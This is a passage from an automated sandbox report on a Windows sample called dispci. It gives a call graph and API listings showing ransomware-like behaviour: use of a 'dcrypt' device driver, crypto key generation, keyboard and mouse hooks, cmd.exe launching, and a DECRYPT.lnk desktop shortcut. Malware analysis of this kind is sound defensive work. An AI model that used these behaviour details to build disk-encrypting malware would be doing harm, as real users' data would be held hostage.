9599 df2975 _memset _memmove 9597->9599 9598 df2650 109 API calls 9600 df2ab2 9598->9600 9599->9580 9599->9598 9600->9580 9601 df3af0 68 API calls 9600->9601 9602 df2ae6 __input_l 9601->9602 9602->9580 9602->9583 9644 df3be0 9602->9644 9605 df3be0 70 API calls 9605->9580 9618 df39e0 9606->9618 9608 df2673 9609 df27de 9608->9609 9610 df2680 DeviceIoControl 9608->9610 9612 df5c9f __ld12tod 5 API calls 9609->9612 9611 df26a5 __input_l 9610->9611 9616 df26b6 __input_l __aulldiv 9610->9616 9613 df27cf CloseHandle 9611->9613 9614 df27f2 9612->9614 9615 df5e4c _free 66 API calls 9613->9615 9614->9569 9615->9609 9616->9611 9616->9613 9635 df3af0 9616->9635 9619 df5d7c __snwprintf 102 API calls 9618->9619 9620 df3a0f 9619->9620 9621 df5e86 _malloc 66 API calls 9620->9621 9622 df3a16 9621->9622 9623 df3a23 CreateFileW 9622->9623 9631 df3adb 9622->9631 9625 df3a48 9623->9625 9626 df3a53 DeviceIoControl 9623->9626 9624 df5c9f __ld12tod 5 API calls 9627 df3aec 9624->9627 9630 df5e4c _free 66 API calls 9625->9630 9628 df3aca 9626->9628 9632 df3a79 __input_l 9626->9632 9627->9608 9628->9625 9629 df3ace CloseHandle 9628->9629 9629->9625 9630->9631 9631->9624 9633 df5c9f __ld12tod 5 API calls 9632->9633 9634 df3ac6 9633->9634 9634->9608 9636 df3b0f __aullrem 9635->9636 9637 df3b20 9636->9637 9638 df5e86 _malloc 66 API calls 9636->9638 9639 df3b63 SetFilePointer 9637->9639 9642 df3b5e _memmove 9637->9642 9638->9637 9640 df3b88 ReadFile 9639->9640 9639->9642 9640->9642 9641 df3bca 9641->9616 9642->9641 9643 df5e4c _free 66 API calls 9642->9643 9643->9641 9645 df3bff __aullrem 9644->9645 9646 df3c10 9645->9646 9647 df5e86 _malloc 66 API calls 9645->9647 9648 df3c4e 9646->9648 9649 df3c56 SetFilePointer 9646->9649 9647->9646 9653 df2ce2 9648->9653 9656 df5e4c _free 66 API calls 9648->9656 9649->9648 9650 df3c78 9649->9650 9651 df3c7f ReadFile 9650->9651 9652 df3cce 9650->9652 9651->9648 9654 df3c97 _memmove 9651->9654 9655 df3cd7 WriteFile 9652->9655 9653->9583 9653->9605 9657 df3cab SetFilePointer 9654->9657 9655->9648 9656->9653 9657->9655 9659 df2e6a __aullrem 9658->9659 9660 df2e7f 9659->9660 9661 df5e86 _malloc 66 API calls 9659->9661 9662 df2ed1 SetFilePointer 9660->9662 9665 df2eca _memmove 9660->9665 9661->9660 9663 df2ef3 ReadFile 9662->9663 9662->9665 9663->9665 9664 df5e4c _free 66 API calls 9666 df2f3a 9664->9666 9665->9664 9665->9666 9666->9523 9666->9525 9668 df39e0 105 API calls 9667->9668 9669 df313f 9668->9669 9670 df314e 9669->9670 9671 df3162 9669->9671 9672 df5c9f __ld12tod 5 API calls 9670->9672 9673 df2e50 68 API calls 9671->9673 9674 df315e 9672->9674 9675 df317d 9673->9675 9674->9538 9676 df329a CloseHandle 9675->9676 9678 df5e86 _malloc 66 API calls 9675->9678 9677 df5e4c _free 66 API calls 9676->9677 9679 df32a9 9677->9679 9681 df3196 9678->9681 9680 df5c9f __ld12tod 5 API calls 9679->9680 9684 df32bb 9680->9684 9682 df31a5 9681->9682 9683 df3af0 68 API calls 9681->9683 9682->9676 9687 df31c9 9683->9687 9684->9538 9685 df31fd 9686 df5e4c _free 66 API calls 9685->9686 9686->9682 9687->9685 9688 df3be0 70 API calls 9687->9688 9688->9685 9690 df39e0 105 API calls 9689->9690 9691 df336f 9690->9691 9692 df337e 9691->9692 9693 df3392 9691->9693 9694 df5c9f __ld12tod 5 API calls 9692->9694 9695 df2e50 68 API calls 9693->9695 9696 df338e 9694->9696 9697 df33ad 9695->9697 9696->9549 9698 df350c CloseHandle 9697->9698 9700 df5e86 _malloc 66 API calls 9697->9700 9699 df5e4c _free 66 API calls 9698->9699 9701 df351b 9699->9701 9702 df33c6 9700->9702 9703 df5c9f __ld12tod 5 API calls 9701->9703 9704 df33d5 9702->9704 9705 df3af0 68 API calls 9702->9705 9706 df352d 9703->9706 9704->9698 9710 df33f9 _memset 9705->9710 9706->9549 9707 df342e 9708 df5e4c _free 66 API calls 9707->9708 9708->9704 9709 df34d6 9711 df3be0 70 API calls 9709->9711 9710->9707 9710->9709 9712 df3be0 70 API calls 9710->9712 9711->9707 9712->9710 9714 df25c0 9713->9714 9714->9714 9715 df25cf TlsGetValue DeviceIoControl 9714->9715 9716 df261a 9715->9716 9717 df2607 9715->9717 9720 df5c9f __ld12tod 5 API calls 9716->9720 9718 df5c9f __ld12tod 5 API calls 9717->9718 9719 df2616 9718->9719 9719->9436 9721 df264c 9720->9721 9721->9436 9723 df5cae _wprintf 104 API calls 9722->9723 9727 df4e70 9723->9727 9724 df25a0 7 API calls 9724->9727 9725 df4eaf TlsGetValue DeviceIoControl 9725->9727 9726 df5cae _wprintf 104 API calls 9726->9727 9727->9724 9727->9725 9727->9726 9727->9727 9728 df4faf TlsGetValue DeviceIoControl 9727->9728 9729 df5000 9727->9729 9730 df5035 9727->9730 9728->9727 9728->9729 9731 df5cae _wprintf 104 API calls 9729->9731 9732 df5cae _wprintf 104 API calls 9730->9732 9733 df500b 9731->9733 9732->9733 9734 df5cae _wprintf 104 API calls 9733->9734 9735 df5018 9734->9735 9736 df5c9f __ld12tod 5 API calls 9735->9736 9737 df502a 9736->9737 9737->8734 9739 df510a 9738->9739 9740 df50d9 9738->9740 9769 df4430 GetCommandLineW GetCommandLineA 9739->9769 9741 df2020 5 API calls 9740->9741 9743 df50ed 9741->9743 9745 df50f4 VirtualLock 9743->9745 9746 df5103 9743->9746 9745->9746 9746->9739 9747 df5116 9746->9747 9748 df5cae _wprintf 104 API calls 9747->9748 9749 df5120 9748->9749 9771 df4950 9749->9771 9752 df5135 9753 df4430 2 API calls 9752->9753 9755 df513f 9753->9755 9754 df3820 8 API calls 9754->9752 9755->8742 9757 df249a TlsGetValue 9756->9757 9758 df2515 9756->9758 9759 df24ac CreateFileW 9757->9759 9760 df24d3 DeviceIoControl 9757->9760 9758->8742 9761 df24fd VirtualLock 9759->9761 9762 df24c5 TlsSetValue 9759->9762 9763 df250c 9760->9763 9764 df24f3 GetLastError 9760->9764 9761->9763 9762->9760 9763->9758 9765 df2541 TlsGetValue DeviceIoControl 9763->9765 9764->9761 9764->9763 9766 df2582 9765->9766 9767 df3820 8 API calls 9766->9767 9768 df258e 9767->9768 9768->8742 9770 df4445 9769->9770 9770->8742 9772 df61c0 71 API calls 9771->9772 9780 df497d 9772->9780 9773 df4c56 9785 df6317 9773->9785 9775 df49c3 29 API calls 9775->9780 9776 df4c63 9777 df5c9f __ld12tod 5 API calls 9776->9777 9778 df4c7e 9777->9778 9778->9752 9778->9754 9779 df3d00 5 API calls 9779->9780 9780->9773 9780->9775 9780->9779 9781 df61c0 71 API calls 9780->9781 9782 df4ba7 EnumWindows 9780->9782 9783 df6317 80 API calls 9780->9783 9781->9780 9784 df3d00 5 API calls 9782->9784 9783->9780 9784->9780 9786 df6323 ___lock_fhandle 9785->9786 9787 df94b6 __lock 66 API calls 9786->9787 9788 df632a 9787->9788 9793 df629b 9788->9793 9792 df6347 ___lock_fhandle 9792->9776 9794 dfa0b6 __getptd 66 API calls 9793->9794 9795 df62a9 9794->9795 9797 dfa7f6 __write_nolock 76 API calls 9795->9797 9798 df62d1 9795->9798 9797->9798 9800 df62d6 9798->9800 9805 dfa7a4 9798->9805 9802 df6350 9800->9802 9827 df93dd RtlLeaveCriticalSection 9802->9827 9804 df6357 9804->9792 9814 dfa68e 9805->9814 9808 dfa64c 9809 dfa65b 9808->9809 9810 dfa660 9808->9810 9826 dfdd00 CreateFileW 9809->9826 9812 dfa66a 9810->9812 9813 dfa671 WriteConsoleW 9810->9813 9812->9800 9813->9812 9815 dfa6a1 9814->9815 9818 df62eb 9814->9818 9816 df61fe _LocaleUpdate::_LocaleUpdate 76 API calls 9815->9816 9815->9818 9817 dfa6c7 9816->9817 9817->9818 9819 dfa7be __isleadbyte_l 76 API calls 9817->9819 9818->9800 9818->9808 9820 dfa6fa 9819->9820 9821 dfa77d MultiByteToWideChar 9820->9821 9822 dfa700 9820->9822 9821->9818 9823 dfa733 9821->9823 9822->9823 9824 dfa713 MultiByteToWideChar 9822->9824 9823->9818 9825 df7924 __cftof2_l 66 API calls 9823->9825 9824->9818 9824->9823 9825->9818 9826->9810 9827->9804 9829 df7e30 ___lock_fhandle 9828->9829 9830 df94b6 __lock 61 API calls 9829->9830 9831 df7e37 9830->9831 9833 df7e62 RtlDecodePointer 9831->9833 9838 df7ee1 9831->9838 9835 df7e79 RtlDecodePointer 9833->9835 9833->9838 9842 df7e8c 9835->9842 9836 df7f5e ___lock_fhandle 9836->8247 9849 df7f4f 9838->9849 9839 df7f46 9841 df7d0c _doexit 3 API calls 9839->9841 9844 df7f4f 9841->9844 9842->9838 9845 df7ea3 RtlDecodePointer 9842->9845 9848 df7eb2 RtlDecodePointer RtlDecodePointer 9842->9848 9854 df9f06 RtlEncodePointer 9842->9854 9843 df7f5c 9843->8247 9844->9843 9856 df93dd RtlLeaveCriticalSection 9844->9856 9855 df9f06 RtlEncodePointer 9845->9855 9848->9842 9850 df7f2f 9849->9850 9851 df7f55 9849->9851 9850->9836 9853 df93dd RtlLeaveCriticalSection 9850->9853 9857 df93dd RtlLeaveCriticalSection 9851->9857 9853->9839 9854->9842 9855->9842 9856->9843 9857->9850 9859 df7e24 _doexit 66 API calls 9858->9859 9860 df7f8b 9859->9860 9861 df3df0 6 API calls 9862 df3e83 9861->9862 9865 df3e92 9861->9865 9869 df3da0 9862->9869 9864 df3d00 5 API calls 9864->9865 9865->9864 9866 df3ecd 9865->9866 9866->9866 9867 df5c9f __ld12tod 5 API calls 9866->9867 9868 df3ef1 9867->9868 9870 df3dd8 9869->9870 9871 df3da7 9869->9871 9870->9865 9870->9870 9871->9870 9872 df3d00 5 API calls 9871->9872 9872->9871 10784 df4223 10787 df4230 10784->10787 10785 df3d00 5 API calls 10785->10787 10786 df4260 EnumWindows 10789 df3d00 5 API calls 10786->10789 10787->10785 10787->10786 10790 df4288 10789->10790 10791 df5c9f __ld12tod 5 API calls 10790->10791 10792 df4293 10791->10792

                                                                      Executed Functions

                                                                      Function 00DF4070 Relevance: 56.1, APIs: 30, Strings: 2, Instructions: 125threadtimewindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00DF4084
                                                                      • GetForegroundWindow.USER32 ref: 00DF4090
                                                                      • GetShellWindow.USER32 ref: 00DF409C
                                                                      • GetCapture.USER32 ref: 00DF40A8
                                                                      • GetClipboardOwner.USER32 ref: 00DF40B4
                                                                      • GetOpenClipboardWindow.USER32 ref: 00DF40C0
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00DF40CC
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF40D8
                                                                      • GetTickCount.KERNEL32 ref: 00DF40E4
                                                                      • GetFocus.USER32 ref: 00DF40F0
                                                                      • GetActiveWindow.USER32 ref: 00DF40FC
                                                                      • GetKBCodePage.USER32 ref: 00DF4108
                                                                      • GetCursor.USER32 ref: 00DF4114
                                                                      • GetLastActivePopup.USER32(?), ref: 00DF4127
                                                                      • GetProcessHeap.KERNEL32 ref: 00DF4133
                                                                      • GetQueueStatus.USER32(000004BF), ref: 00DF4144
                                                                      • GetInputState.USER32 ref: 00DF4150
                                                                      • GetMessageTime.USER32 ref: 00DF415C
                                                                      • GetOEMCP.KERNEL32 ref: 00DF4168
                                                                      • GetCursorInfo.USER32(?), ref: 00DF4193
                                                                      • GetCaretPos.USER32(?), ref: 00DF41A0
                                                                      • GetCurrentThread.KERNEL32 ref: 00DF41C2
                                                                      • GetThreadTimes.KERNEL32(00000000), ref: 00DF41C9
                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00DF41EE
                                                                      • GetProcessTimes.KERNELBASE(00000000), ref: 00DF41F1
                                                                      • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00DF41FD
                                                                      • K32GetProcessMemoryInfo.KERNEL32(00000000), ref: 00DF4200
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00DF420A
                                                                      • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00DF4214
                                                                      • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00DF427D
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                                                      • String ID: ($@
                                                                      • API String ID: 3079641271-1311469180
                                                                      • Opcode ID: 1575ba47818ea86ccc582740dda8321a556e0ec5cf78281496197117b34d609a
                                                                      • Instruction ID: 63ac78d155f4a00c51b85a2a3803f609f85b09698dc059ce2cda0e4b1a32c0ff
                                                                      • Opcode Fuzzy Hash: 1575ba47818ea86ccc582740dda8321a556e0ec5cf78281496197117b34d609a
                                                                      • Instruction Fuzzy Hash: 55519875C012199FDB15AFB1ED4CAD9BBB8FB08301F008599E54AA7260DB759AC8CF60
                                                                      Function 00DF5150 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 109comsleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00DF517C
                                                                      • CoCreateInstance.COMBASE(00E03328,00000000,00000001,00E03318,?), ref: 00DF519F
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00DF51BB
                                                                      • GetVersion.KERNEL32 ref: 00DF520A
                                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000410), ref: 00DF5233
                                                                      • Sleep.KERNELBASE(00001388), ref: 00DF528A
                                                                      • CoUninitialize.COMBASE ref: 00DF52AE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: CreateEnvironmentExpandFileInitializeInstanceModuleNameSleepStringsUninitializeVersion
                                                                      • String ID: %ALLUSERSPROFILE%$%PUBLIC%$DECRYPT$\Desktop\DECRYPT.lnk
                                                                      • API String ID: 3778704366-674991135
                                                                      • Opcode ID: ba7571a33a32cb02355bfe230dab2c0f357fb3649ee85927f9dc3e49e50c865f
                                                                      • Instruction ID: 049434f915f8084eb2a19a9aa991d3938fc167147d69e11ef16cfa292ff06e97
                                                                      • Opcode Fuzzy Hash: ba7571a33a32cb02355bfe230dab2c0f357fb3649ee85927f9dc3e49e50c865f
                                                                      • Instruction Fuzzy Hash: E1417135701718AFDB10DBA4DC85FAA73B9FF89700F108194F60AAB294D671AE85CF61
                                                                      Function 00DF42A0 Relevance: 15.1, APIs: 10, Instructions: 121encryptionthreadmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,00002000,00003000,00000040), ref: 00DF42CD
                                                                        • Part of subcall function 00DF2020: TlsGetValue.KERNEL32(?), ref: 00DF202B
                                                                        • Part of subcall function 00DF2020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2043
                                                                      • VirtualLock.KERNEL32(?,00002000), ref: 00DF4307
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF4337
                                                                      • SetWindowsHookExW.USER32(00000007,Function_00003F00,00000000,00000000), ref: 00DF4349
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF4350
                                                                      • SetWindowsHookExW.USER32(00000002,Function_00003FC0,00000000,00000000), ref: 00DF435C
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 00DF4378
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 00DF438B
                                                                      • CryptGenRandom.ADVAPI32(?,00000200,?), ref: 00DF43A8
                                                                      • CryptReleaseContext.ADVAPI32(?,000001FF), ref: 00DF440F
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Context$AcquireCurrentHookThreadVirtualWindows$AllocCreateFileLockRandomReleaseValue
                                                                      • String ID:
                                                                      • API String ID: 330245633-0
                                                                      • Opcode ID: 7aaa45c15a6e486a5fc2a9f718b441676b81cdd4972318e24b59846cd439d5e0
                                                                      • Instruction ID: 2879beba17d6eeac076084292b54c3b1cb41e036abecdfb91ef5dda782fe888e
                                                                      • Opcode Fuzzy Hash: 7aaa45c15a6e486a5fc2a9f718b441676b81cdd4972318e24b59846cd439d5e0
                                                                      • Instruction Fuzzy Hash: D641B770A4031CAEE7209B65DC49FAB77B8EB14700F154165E605FB1D1DAB1A9848BB1
                                                                      Function 00DF2020 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 142 df2020-df2035 TlsGetValue 143 df2068-df208b DeviceIoControl 142->143 144 df2037-df204e CreateFileW 142->144 145 df208d-df2097 GetLastError 143->145 146 df2098-df209e 143->146 147 df205a-df2062 TlsSetValue 144->147 148 df2050-df2059 144->148 147->143
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?), ref: 00DF202B
                                                                      • CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2043
                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 00DF2062
                                                                      • DeviceIoControl.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00DF2083
                                                                      • GetLastError.KERNEL32 ref: 00DF208D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ControlCreateDeviceErrorFileLast
                                                                      • String ID: \\.\dcrypt
                                                                      • API String ID: 2163648868-1945893055
                                                                      • Opcode ID: b0c73a515ff696a1a7e4edeee4d3c87568691adc1fdab9ba966115f47bbb8407
                                                                      • Instruction ID: ba32785b34a233cc42204ada7f03d58ec65eb77b37a6dcacded525b3ea3920f8
                                                                      • Opcode Fuzzy Hash: b0c73a515ff696a1a7e4edeee4d3c87568691adc1fdab9ba966115f47bbb8407
                                                                      • Instruction Fuzzy Hash: 1E015272601619BFD710DF69EC49EBB3B9CEB48761F004245FD09E3240DA629D4487F0
                                                                      Function 00DF43B7 Relevance: 1.5, APIs: 1, Instructions: 35encryptionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 173 df43b7-df43be 174 df43c0-df43db 173->174 175 df43dd-df43e2 call df3d00 174->175 176 df43e7-df43ee 174->176 175->176 176->174 178 df43f0-df43fb 176->178 180 df4400-df4405 178->180 180->180 181 df4407-df4415 CryptReleaseContext call df4070 180->181 184 df441a-df442b call df5c9f 181->184
                                                                      APIs
                                                                      • CryptReleaseContext.ADVAPI32(?,000001FF), ref: 00DF440F
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ContextControlCreateCryptDeviceErrorFileLastRelease
                                                                      • String ID:
                                                                      • API String ID: 3296926122-0
                                                                      • Opcode ID: e0bcc7fd974efaaf1ec2130afbc4169c88677baf7bad778e066ce415fda5a21e
                                                                      • Instruction ID: 80868da62797e0034491c7cb68600862e2bb67b78c4330b428fc0730db3ab617
                                                                      • Opcode Fuzzy Hash: e0bcc7fd974efaaf1ec2130afbc4169c88677baf7bad778e066ce415fda5a21e
                                                                      • Instruction Fuzzy Hash: C7F0C23050424C8FD711AF64EC4836B77A4EB10300F0A45A8D696D7266CA305C8187A1
                                                                      Function 00DF3DF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 77threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00DF3E1A
                                                                      • GetClientRect.USER32 ref: 00DF3E3D
                                                                      • GetWindowRect.USER32(?,?), ref: 00DF3E49
                                                                      • GetWindowInfo.USER32(?,?), ref: 00DF3E55
                                                                      • GetGUIThreadInfo.USER32(?,?), ref: 00DF3E65
                                                                      • GetWindowTextW.USER32(?,?,00000104), ref: 00DF3E79
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Window$InfoRectThread$ClientProcessText
                                                                      • String ID: 0$<
                                                                      • API String ID: 2833114922-95265187
                                                                      • Opcode ID: 819183c6fdaabc36fc0558026f3a6a9e219ecedcd3d26d34cfd2d8b39cabcb18
                                                                      • Instruction ID: 6bda1fa7686fb71aa4d2dad0b6618334de4bb135f3fc44f5712743b212baa67f
                                                                      • Opcode Fuzzy Hash: 819183c6fdaabc36fc0558026f3a6a9e219ecedcd3d26d34cfd2d8b39cabcb18
                                                                      • Instruction Fuzzy Hash: 6F218F71104349AFD320EF64DC84AABB7E8FF85300F05491DF58597260DB719A4DCBA2
                                                                      Function 00DF5810 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 71processstringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00DF57B0: _vswprintf_s.LIBCMT ref: 00DF57DB
                                                                      • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
                                                                      • lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
                                                                      • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryEnvironmentProcessSystemVariable_vswprintf_slstrcat
                                                                      • String ID: /c %ws$ComSpec$D$\cmd.exe
                                                                      • API String ID: 306406079-851825698
                                                                      • Opcode ID: 7075bdd1eb614c1e47b36aa6ba57b791369f7d922d6ec3523e49bd9c1beb4ec4
                                                                      • Instruction ID: 380e11c1fa2ec32169c261c0b539a09ab30598978d72aacb033b0cdc1caa7cf7
                                                                      • Opcode Fuzzy Hash: 7075bdd1eb614c1e47b36aa6ba57b791369f7d922d6ec3523e49bd9c1beb4ec4
                                                                      • Instruction Fuzzy Hash: 52219571A0074CAFEB10DB60DC45BB977BDDB58700F404599A709BB1C0EAB1AE888F64
                                                                      Function 00DF5660 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99sleepsynchronizationCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
